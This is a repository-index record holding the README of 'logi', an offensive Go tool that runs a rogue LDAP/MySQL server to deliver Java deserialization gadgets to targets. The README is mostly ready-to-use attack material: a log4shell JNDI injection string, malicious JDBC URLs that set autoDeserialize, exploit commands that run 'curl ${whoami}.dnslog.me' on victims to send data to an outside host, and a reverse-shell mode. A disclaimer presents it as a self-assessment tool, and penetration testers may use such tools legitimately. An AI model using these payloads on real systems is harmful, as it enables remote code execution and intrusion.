{"id":21523620,"url":"https://github.com/cokebeer/logi","last_synced_at":"2025-04-09T22:51:31.895Z","repository":{"id":62865160,"uuid":"556598376","full_name":"cokeBeer/logi","owner":"cokeBeer","description":"Logi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.","archived":false,"fork":false,"pushed_at":"2022-12-08T05:08:26.000Z","size":349,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-09T22:51:22.001Z","etag":null,"topics":["commons-beanutils","custom","cve-2020-14644","deserialize","exploit","gadget","go","java","jdbc","jndi","ldap","log4j","mysql","probe","server","wordlist"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cokeBeer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-10-24T06:41:53.000Z","updated_at":"2025-03-19T10:00:50.000Z","dependencies_parsed_at":"2023-01-24T23:30:07.118Z","dependency_job_id":null,"html_url":"https://github.com/cokeBeer/logi","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Flogi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cokeBeer","download_url":"https://codeload.github.co
m/cokeBeer/logi/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248125643,"owners_count":21051766,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["commons-beanutils","custom","cve-2020-14644","deserialize","exploit","gadget","go","java","jdbc","jndi","ldap","log4j","mysql","probe","server","wordlist"],"created_at":"2024-11-24T01:18:50.433Z","updated_at":"2025-04-09T22:51:31.847Z","avatar_url":"https://github.com/cokeBeer.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ☕️LOGI\nLogi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.\n\n\n- [☕️LOGI](#️logi)\n  - [Disclaimer](#disclaimer)\n  - [✨Get started](#get-started)\n  - [⚙️How it work](#️how-it-work)\n  - [🚀Examples](#examples)\n    - [📖LDAP](#ldap)\n    - [🐬MySQL](#mysql)\n  - [🔮Image](#image)\n  - [💻See also](#see-also)\n\n## Disclaimer\nThis tool is intended only for security self-assessment and detection.\n\nAny direct or indirect consequences and losses caused by spreading or using the information provided by this tool are the sole responsibility of the user; the author assumes no responsibility for them.\n\nI reserve the right to modify and interpret this tool. Without permission from the network security department and other relevant departments, this tool must not be used on one's own authority for any attack activity, and must not be used for commercial purposes in any way.\n\n## ✨Get started\nDownload logi from [release](https://github.com/cokeBeer/logi/releases), or use `go install`\n```\ngo install github.com/cokeBeer/logi/cmd/logi@latest\n```\nUse `-h` to show help.\n```\n$ ./logi -h\nLogi is a LDAP/MySQL server focusing on pingback deserialize recon and exploit.\n\nUsage:\n  ./logi [flags]\n\nFlags:\nBASIC CONFIG:\n   -m, -mode int  1 for poc , 2 for probe, 3 for exploit\n   -t, -type int  1 for ldap, 2 for mysql\nSERVE CONFIG:\n   -i, -ip string    ip for binding (default \"0.0.0.0\")\n   -p, 
-port string  port for binding (default \"1389\")\n...\n```\n\n## ⚙️How it work\nLogi hosts an LDAP/MySQL service and waits for an LDAP lookup or a MySQL connection\n- poc mode: replies with a urldns gadget pointing to `domain` to verify deserialization\n- probe mode: replies with different probe gadgets pointing to `probename.domain`, in turn, to probe dependencies\n- exploit mode: replies with a gadget for command execution\n\n## 🚀Examples\n### 📖LDAP\n**Poc mode**\n\nRun poc mode with dns domain `dnslog.me`:\n```\n./logi -t 1 -m 1 -d dnslog.me\n```\nYou need to send an LDAP lookup to logi.\nFor example, a log4shell poc like the one below can trigger a JNDI lookup to your server.\n```\n${jndi:ldap://your-ip:your-port/somepath}\n```\nlogi will send a response that contains a serialized payload. After the target deserializes the payload, it will look up a domain named `somepath.dnslog.me`. You can use this feature to confirm deserialization and mark targets.\n\n**Probe mode with embedded wordlist**\n\nRun probe mode with dns domain `dnslog.me` and the embedded wordlist `yso`:\n```\n./logi -t 1 -m 2 -d dnslog.me -w yso\n```\nYou need to send the request many times to traverse the wordlist, which can be done with BurpSuite.\n```\nrepeat ${jndi:ldap://your-ip:your-port/somepath} many times\n```\nAfter the target deserializes logi's response, it will look up the domain `ith-classname.somepath.dnslog.me`. You can use this feature to probe dependencies. 
Also, the number of classes in the dict is printed to the console when logi starts; you can use this information to control the repetition.\n\n**Probe mode with custom wordlist**\n\nRun probe mode with dns domain `dnslog.me` and a custom wordlist in `./dict.txt`:\n```\n./logi -t 1 -m 2 -d dnslog.me -wp ./dict.txt\n```\nThe dict contains one class name per line.\n\n**Exploit mode with embedded gadget**\n\nRun exploit mode with gadget `cb1v18` and command `curl ${whoami}.dnslog.me`:\n```\n./logi -t 1 -m 3 -g cb1v18 -c 'curl ${whoami}.dnslog.me'\n```\n**Exploit mode to get a reverse shell**\n\nRun exploit mode with gadget `cb1v18` and a reverse shell to `127.0.0.1:7777`:\n```\n./logi -t 1 -m 3 -g cb1v18 -s '127.0.0.1:7777'\n```\n**Exploit mode with custom gadget**\n\nRun exploit mode with a custom binary payload in `./cc1`:\n```\n./logi -t 1 -m 3 -b ./cc1\n```\n\n### 🐬MySQL\nIn MySQL type, a fake MySQL server will be started. Poc mode and probe mode work the same as in LDAP type, but logi mainly focuses on exploit mode.\n\n\u003e It's OK to just replace -t 1 with -t 2 in the above commands\n\nRun exploit mode on port `3307` with gadget `cb1v18` and command `curl ${whoami}.dnslog.me`:\n\n```\n./logi -t 2 -m 3 -p 3307 -g cb1v18 -c 'curl ${whoami}.dnslog.me'\n```\nYou need to send a JDBC connection to logi.\n```\njdbc:mysql://your-ip:your-port/someschema?autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026useSSL=false\n```\nYou can also remove the param `useSSL=false`; this causes JDBC to connect over TLS, and logi supports TLS connections too :).\n```\njdbc:mysql://your-ip:your-port/someschema?autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\n```\n\n## 🔮Image\n![image](image/logi.png)\n![image](image/dnslog.png)\n## 💻See 
also\n[GadgetProbe](https://github.com/BishopFox/GadgetProbe)\n\n[JNDI-Inject-Exploit](https://github.com/exp1orer/JNDI-Inject-Exploit)\n\n[Urldns](https://github.com/kezibei/Urldns)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Flogi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcokebeer%2Flogi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Flogi/lists"}